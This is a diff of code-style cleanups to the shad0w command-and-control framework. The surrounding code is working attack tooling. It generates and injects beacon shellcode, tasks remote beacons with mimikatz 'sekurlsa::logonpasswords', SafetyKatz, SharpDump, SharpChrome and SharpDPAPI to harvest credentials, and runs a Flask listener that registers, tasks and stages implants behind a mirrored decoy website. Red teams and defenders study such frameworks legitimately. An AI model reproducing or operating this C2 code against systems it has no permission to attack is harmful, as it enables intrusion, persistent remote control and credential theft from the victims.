||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def build_inject_info(args, rcode):
|
||||
|
||||
|
@ -43,6 +45,7 @@ def build_inject_info(args, rcode):
|
|||
|
||||
return json.dumps(info)
|
||||
|
||||
|
||||
def generate_beacon_code(shad0w):
|
||||
buildtools.clone_source_files(rootdir='injectable')
|
||||
|
||||
|
@ -63,6 +66,7 @@ def generate_beacon_code(shad0w):
|
|||
|
||||
return buildtools.extract_shellcode()
|
||||
|
||||
|
||||
def format_shellcode(shellcode):
|
||||
hshellcode = ""
|
||||
|
||||
|
@ -76,6 +80,7 @@ def format_shellcode(shellcode):
|
|||
|
||||
return hshellcode
|
||||
|
||||
|
||||
def write_header(code, file_loc):
|
||||
hex_code = format_shellcode(code)
|
||||
|
||||
|
@ -90,12 +95,14 @@ unsigned int beacon_bin_len = %s;
|
|||
|
||||
return
|
||||
|
||||
|
||||
def get_dll_data(file_loc):
|
||||
with open(file_loc, "rb") as file:
|
||||
data = file.read()
|
||||
|
||||
return base64.b64encode(data).decode()
|
||||
|
||||
|
||||
def generate_beacon_dll(shad0w, rcode):
|
||||
# write header file
|
||||
write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h")
|
||||
|
@ -105,13 +112,14 @@ def generate_beacon_dll(shad0w, rcode):
|
|||
made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64")
|
||||
|
||||
# check that the dll has built
|
||||
if made != True:
|
||||
if made is not True:
|
||||
shad0w.debug.error("Error building migrate dll.")
|
||||
return
|
||||
|
||||
# return the base64 dll data
|
||||
return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
|
||||
|
||||
|
||||
def await_impersonate(shad0w, pid):
|
||||
while True:
|
||||
if shad0w.beacons[shad0w.current_beacon]["impersonate"] == None:
|
||||
|
@ -128,6 +136,7 @@ def await_impersonate(shad0w, pid):
|
|||
shad0w.debug.good(f"Successfully migrated ({pid})")
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -20,17 +20,18 @@ MIMIKATZ_BIN = "/root/shad0w/bin/mimikatz.x64.exe"
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def mimikatz_callback(shad0w, data):
|
||||
data = data.replace(".#####.", "\033[1;32m.#####.\033[0m")
|
||||
data = data.replace(".## ^ ##.", "\033[1;32m.##\033[0m \033[1;39m^\033[0m \033[1;32m##.\033[0m")
|
||||
|
@ -43,6 +44,7 @@ def mimikatz_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -101,4 +103,4 @@ mimikatz -x sekurlsa::logonpasswords
|
|||
b64_comp_data = shellcode.generate(MIMIKATZ_BIN, args, params)
|
||||
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback
|
||||
|
|
|
@ -9,7 +9,7 @@ __description__ = "Create a new directory on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_MKDIR = 0x5000
|
||||
|
||||
ERROR = False
|
||||
|
@ -21,9 +21,11 @@ def error(message):
|
|||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def mkdir_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
|
|
@ -9,14 +9,16 @@ __description__ = "Show running processes"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "process"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_PID = 0x8000
|
||||
|
||||
|
||||
def ps_callback(shad0w, data):
|
||||
sys.stdout.write(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -30,4 +32,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = ps_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -28,21 +28,24 @@ error_list = ""
|
|||
# make the command output a bit cleaner
|
||||
FIRST_OUTPUT = True
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def psh_callback(shad0w, data):
|
||||
global FIRST_OUTPUT
|
||||
|
||||
|
@ -59,9 +62,11 @@ def psh_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def encode_string(data):
|
||||
return base64.b64encode(data.encode())
|
||||
|
||||
|
||||
def random_string():
|
||||
rstring = ""
|
||||
alphabet = string.ascii_lowercase + string.ascii_uppercase
|
||||
|
@ -71,10 +76,12 @@ def random_string():
|
|||
|
||||
return rstring
|
||||
|
||||
|
||||
def do_copy():
|
||||
os.system("cp /root/shad0w/modules/windows/psh/*.cs /root/shad0w/modules/windows/psh/build")
|
||||
os.system("cp /root/shad0w/modules/windows/psh/*.dll /root/shad0w/modules/windows/psh/build")
|
||||
|
||||
|
||||
def write_args(pwsh):
|
||||
do_copy()
|
||||
|
||||
|
@ -90,6 +97,7 @@ def write_args(pwsh):
|
|||
with open("/root/shad0w/modules/windows/psh/build/main.cs", "w") as file:
|
||||
file.write(new_file)
|
||||
|
||||
|
||||
def compile_binary():
|
||||
cwd = os.getcwd()
|
||||
|
||||
|
@ -97,6 +105,7 @@ def compile_binary():
|
|||
os.system("mcs /reference:System.Management.Automation.dll -out:psh.exe main.cs")
|
||||
os.chdir(cwd)
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
raw_args = args
|
||||
|
|
|
@ -7,14 +7,16 @@ __description__ = "Show the current working directory on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_PWD = 0x3000
|
||||
|
||||
|
||||
def pwd_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -28,4 +30,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = pwd_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -15,21 +15,24 @@ OPCODE_RM = 0x4000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def rm_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# save the raw args
|
||||
|
@ -48,9 +51,9 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
|
|||
"""
|
||||
|
||||
parse = argparse.ArgumentParser(prog='rm',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
parse.error = error
|
||||
|
@ -77,4 +80,4 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = rm_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of safetykatz binary
|
||||
SAFETYKATZ_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SafetyKatz.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def safetykatz_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of seatbelt binary
|
||||
SEATBELT_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Seatbelt.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def seatbelt_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
help_stuff = """
|
||||
%&&@@@&&
|
||||
|
@ -206,6 +209,7 @@ def usage():
|
|||
"""
|
||||
print(help_stuff)
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -10,16 +10,18 @@ __type__ = "beacon"
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
global ERROR
|
||||
|
||||
|
@ -77,4 +79,4 @@ set -v MsfStageSize -d 14
|
|||
shad0w.debug.error("Key Error")
|
||||
return
|
||||
|
||||
return
|
||||
return
|
||||
|
|
|
@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of Sharpchrome binary
|
||||
SHARPCHROME_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpChrome.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpchrome_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
pass
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,19 +16,22 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharpdpapi binary
|
||||
SHARPDPAPI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDPAPI.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpdpapi_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
pass
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharpdump binary
|
||||
SHARPDUMP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDump.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpdump_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,8 +16,9 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharphound binary
|
||||
SHARPHOUND_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpHound.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
@ -26,6 +27,7 @@ def sharphound_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -26,22 +26,25 @@ error_list = ""
|
|||
# location of sharpsocks binary
|
||||
sharpsocks_BIN = "/root/shad0w/bin/SharpSocks.x86.exe"
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def sharpsocks_callback(shad0w, data):
|
||||
if shad0w.sharpsocks_verbose:
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd_line=None):
|
||||
# modules directory
|
||||
modules_dir = "/root/shad0w/modules/windows/sharpsocks/"
|
||||
|
@ -64,8 +67,8 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
|
|||
|
||||
try:
|
||||
os.unlink("/tmp/sharpsocks.log")
|
||||
except: pass
|
||||
|
||||
except:
|
||||
pass
|
||||
|
||||
data = ""
|
||||
for _ in range(0, 5):
|
||||
|
@ -89,10 +92,12 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
|
|||
|
||||
return key
|
||||
|
||||
|
||||
def kill_server():
|
||||
os.popen("killall -9 SharpSocksServe")
|
||||
return
|
||||
|
||||
|
||||
def await_for_socks_start(shad0w):
|
||||
while True:
|
||||
try:
|
||||
|
@ -105,6 +110,7 @@ def await_for_socks_start(shad0w):
|
|||
except FileNotFoundError: pass
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
global EXEC_SHARPSOCKS
|
||||
|
||||
|
@ -148,7 +154,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
|
|||
pass
|
||||
|
||||
# make sure we have an argument
|
||||
if (len(raw_args) == 1):
|
||||
if len(raw_args) == 1:
|
||||
parse.print_help()
|
||||
return
|
||||
|
||||
|
@ -192,4 +198,4 @@ sharpsocks client -s http://your.redirector:port/ -k key
|
|||
b64_comp_data = shellcode.generate(sharpsocks_BIN, args, args.param)
|
||||
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
|
||||
|
|
|
@ -16,16 +16,18 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of SharpUp binary
|
||||
SHARPUP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpUp.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpup_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharpwmi binary
|
||||
SHARPWMI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpWMI.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpwmi_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
pass
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -21,16 +21,18 @@ error_list = ""
|
|||
FILE_TO_UPLOAD = ""
|
||||
FILE_DATA = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def upload_callback(shad0w, data):
|
||||
global FILE_TO_UPLOAD, FILE_DATA
|
||||
|
||||
|
@ -66,8 +68,8 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
|
|||
|
||||
# init the parser
|
||||
parse = argparse.ArgumentParser(prog='upload',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
|
@ -138,4 +140,4 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = upload_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of Watson binary
|
||||
WATSON_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Watson.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def watson_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -21,16 +21,18 @@ TMP_EXEC_ID = 0x3000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def whoami_callback(shad0w, data):
|
||||
if len(data) > 1:
|
||||
print("")
|
||||
|
@ -38,6 +40,7 @@ def whoami_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def get_whoami_args(args):
|
||||
data = ""
|
||||
|
||||
|
@ -52,6 +55,7 @@ def get_whoami_args(args):
|
|||
|
||||
return data
|
||||
|
||||
|
||||
async def main(shad0w, args):
|
||||
global ERROR
|
||||
|
||||
|
@ -124,4 +128,4 @@ whoami --groups
|
|||
rcode = base64.b64encode(shellcode.generate(file, None, None, parse=False)).decode()
|
||||
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = whoami_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)
|
||||
|
|
|
@ -4,6 +4,7 @@ Compile the stuff
|
|||
|
||||
import os
|
||||
|
||||
|
||||
class Binary(object):
|
||||
def __init__(self):
|
||||
super(Binary, self).__init__()
|
||||
|
|
|
@ -16,6 +16,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
|
|||
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
|
||||
from prompt_toolkit.shortcuts import prompt, CompleteStyle, PromptSession
|
||||
|
||||
|
||||
class Console(object):
|
||||
|
||||
def __init__(self, shad0w):
|
||||
|
@ -102,7 +103,8 @@ class Console(object):
|
|||
print("ERROR:", e)
|
||||
|
||||
# if in debug mode drop the full traceback
|
||||
if self.shad0w.debugv: traceback.print_exc()
|
||||
if self.shad0w.debugv:
|
||||
traceback.print_exc()
|
||||
|
||||
pass
|
||||
except KeyboardInterrupt:
|
||||
|
|
|
@ -2,6 +2,7 @@ import sys
|
|||
import time
|
||||
import threading
|
||||
|
||||
|
||||
class Debug(object):
|
||||
def __init__(self, arg):
|
||||
super(Debug, self).__init__()
|
||||
|
@ -36,8 +37,7 @@ class Debug(object):
|
|||
|
||||
sys.stdout.write("\r")
|
||||
|
||||
|
||||
def spinner(self, text):
|
||||
spin_thread = threading.Thread(target=self.do_spinner, args=(text,))
|
||||
spin_thread.daemon = False
|
||||
spin_thread.start()
|
||||
spin_thread.start()
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
import random
|
||||
|
||||
|
||||
class XOR(object):
|
||||
def __init__(self):
|
||||
super(XOR, self).__init__()
|
||||
|
@ -8,6 +9,7 @@ class XOR(object):
|
|||
def gen_key(self):
|
||||
self.key = random.randint(10, 100)
|
||||
|
||||
|
||||
def crypt_file(self, crypt, key, infile=None, data=None, data_length=None):
|
||||
bytes = ""
|
||||
if (infile != None) and (data == None):
|
||||
|
|
|
@ -11,13 +11,14 @@ from flask import Flask, request, jsonify, Response
|
|||
app = Flask(__name__)
|
||||
|
||||
# shut flask output up
|
||||
log = logging.getLogger('werkzeug')
|
||||
log.disabled = True
|
||||
cli = sys.modules['flask.cli']
|
||||
log = logging.getLogger('werkzeug')
|
||||
log.disabled = True
|
||||
cli = sys.modules['flask.cli']
|
||||
cli.show_server_banner = lambda *x: None
|
||||
|
||||
IGNORE_CONTENT = ""
|
||||
|
||||
|
||||
@app.before_request
|
||||
def log_request():
|
||||
# this will show every request that the flask server gets
|
||||
|
@ -27,6 +28,7 @@ def log_request():
|
|||
# do nothing just return
|
||||
return None
|
||||
|
||||
|
||||
@app.route("/")
|
||||
def web_blank_page():
|
||||
# this page should never be hit by a legit beacon, so if it is then its not a beacon.
|
||||
|
@ -39,6 +41,7 @@ def web_blank_page():
|
|||
elif shad0w.mirror is not None:
|
||||
return shad0w.page_data
|
||||
|
||||
|
||||
@app.route("/register", methods=["GET", "POST"])
|
||||
def web_register_beacon():
|
||||
# register the beacon
|
||||
|
@ -48,18 +51,21 @@ def web_register_beacon():
|
|||
# just give it the request so it can pull stuff out itself
|
||||
return phandle.register_beacon(request)
|
||||
|
||||
|
||||
@app.route("/tasks", methods=["GET", "POST"])
|
||||
def web_task_beacon():
|
||||
# register a task on a beacon
|
||||
|
||||
return phandle.task_beacon(request)
|
||||
|
||||
|
||||
@app.route("/stage", methods=["GET", "POST"])
|
||||
def web_stage_beacon():
|
||||
# send the requested stage to a beacon
|
||||
|
||||
return phandle.stage_beacon(request)
|
||||
|
||||
|
||||
@app.errorhandler(404)
|
||||
def not_found(e):
|
||||
|
||||
|
@ -77,7 +83,8 @@ def not_found(e):
|
|||
for obj in shad0w.beacons[shad0w.current_beacon]["serve"]:
|
||||
if obj == request.path:
|
||||
return shad0w.beacons[shad0w.current_beacon]["serve"][obj]
|
||||
except: pass
|
||||
except:
|
||||
pass
|
||||
|
||||
if shad0w.mirror is None:
|
||||
return ""
|
||||
|
@ -90,10 +97,11 @@ def not_found(e):
|
|||
|
||||
return Response(data, status_code, headers)
|
||||
|
||||
|
||||
def run_serv(*args):
|
||||
# cant think of a better way doing this so guess i gotta use globals
|
||||
global shad0w, phandle
|
||||
shad0w = args[0]
|
||||
shad0w = args[0]
|
||||
|
||||
phandle = Handler(shad0w)
|
||||
|
||||
|
|
|
@ -5,6 +5,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
|
|||
|
||||
from lib.commands import *
|
||||
|
||||
|
||||
class Handler(object):
|
||||
|
||||
def __init__(self, shad0w):
|
||||
|
@ -17,8 +18,8 @@ class Handler(object):
|
|||
# split command into name + args
|
||||
|
||||
splitcommand = cmd.split(" ")
|
||||
basecmd = splitcommand[0]
|
||||
cmd_args = splitcommand[0:]
|
||||
basecmd = splitcommand[0]
|
||||
cmd_args = splitcommand[0:]
|
||||
|
||||
# see if we need to execute a local command
|
||||
try:
|
||||
|
@ -35,7 +36,8 @@ class Handler(object):
|
|||
os.chdir(cwd)
|
||||
|
||||
return
|
||||
except IndexError: pass
|
||||
except IndexError:
|
||||
pass
|
||||
|
||||
# find the handle for the module in the globals list an call it with args
|
||||
|
||||
|
|
|
@ -3,9 +3,11 @@
|
|||
import re
|
||||
import requests
|
||||
|
||||
|
||||
def get_base_domain(site):
|
||||
return site.replace("https://", "").replace("http://", "").replace("/", "")
|
||||
|
||||
|
||||
def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, headers=None, data=None, cookies=None):
|
||||
try:
|
||||
if dynamic:
|
||||
|
@ -31,6 +33,7 @@ def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, head
|
|||
if htmlonly:
|
||||
return req.text
|
||||
|
||||
|
||||
def fix_internal_links(shad0w, html, site):
|
||||
# add us to paths
|
||||
if shad0w.endpoint is None:
|
||||
|
@ -50,6 +53,7 @@ def fix_internal_links(shad0w, html, site):
|
|||
|
||||
return html
|
||||
|
||||
|
||||
def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=None, cookies=None):
|
||||
|
||||
if not dynamic:
|
||||
|
@ -61,4 +65,4 @@ def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=Non
|
|||
if dynamic:
|
||||
data, headers, status_code = get_base_page(shad0w, site, dynamic=dynamic, method=method, headers=headers, data=data, cookies=cookies)
|
||||
data = fix_internal_links(shad0w, data, site)
|
||||
return data, status_code, headers
|
||||
return data, status_code, headers
|
||||
|
|
|
@ -8,7 +8,8 @@ from .responce_builder import Builder
|
|||
|
||||
DATA_CMD_OUT = 0x2000
|
||||
DATA_CMD_PRO = 0x3000
|
||||
DO_CALLBACK = 0x4000
|
||||
DO_CALLBACK = 0x4000
|
||||
|
||||
|
||||
class Handler(object):
|
||||
|
||||
|
@ -106,12 +107,12 @@ class Handler(object):
|
|||
self.shad0w.beacons[beacon_id]["num"] = self.shad0w.beacon_count
|
||||
|
||||
# store basic info about beacon
|
||||
self.shad0w.beacons[beacon_id]["domain"] = domain
|
||||
self.shad0w.beacons[beacon_id]["machine"] = machine
|
||||
self.shad0w.beacons[beacon_id]["username"] = username
|
||||
self.shad0w.beacons[beacon_id]["arch"] = arch
|
||||
self.shad0w.beacons[beacon_id]["os"] = opsystem
|
||||
self.shad0w.beacons[beacon_id]["impersonate"] = None
|
||||
self.shad0w.beacons[beacon_id]["domain"] = domain
|
||||
self.shad0w.beacons[beacon_id]["machine"] = machine
|
||||
self.shad0w.beacons[beacon_id]["username"] = username
|
||||
self.shad0w.beacons[beacon_id]["arch"] = arch
|
||||
self.shad0w.beacons[beacon_id]["os"] = opsystem
|
||||
self.shad0w.beacons[beacon_id]["impersonate"] = None
|
||||
|
||||
# if we are impersonating a session then tell that beacon
|
||||
if str(impersonate) != "None":
|
||||
|
@ -202,7 +203,6 @@ class Handler(object):
|
|||
self.shad0w.debug.log("invalid http method for stager")
|
||||
return self.builder.build(blank=True)
|
||||
|
||||
|
||||
def blank_page(self):
|
||||
# does what the function says
|
||||
return self.builder.build(blank=True)
|
||||
|
|
|
@ -10,11 +10,13 @@ from lib.templates import powershell
|
|||
|
||||
formats = ('raw', 'exe', 'psh', 'dll')
|
||||
|
||||
|
||||
def get_size(filename):
|
||||
# get the bytes of the exe
|
||||
with open(filename, 'rb') as file:
|
||||
return len(file.read())
|
||||
|
||||
|
||||
def format_raw(builder, length=True, code=False):
|
||||
# extract the shellcode from the new beacon
|
||||
rcode = buildtools.extract_shellcode()
|
||||
|
@ -28,6 +30,7 @@ def format_raw(builder, length=True, code=False):
|
|||
if code:
|
||||
return rcode
|
||||
|
||||
|
||||
def format_exe(builder, length=True, code=False):
|
||||
# get the bytes of the exe
|
||||
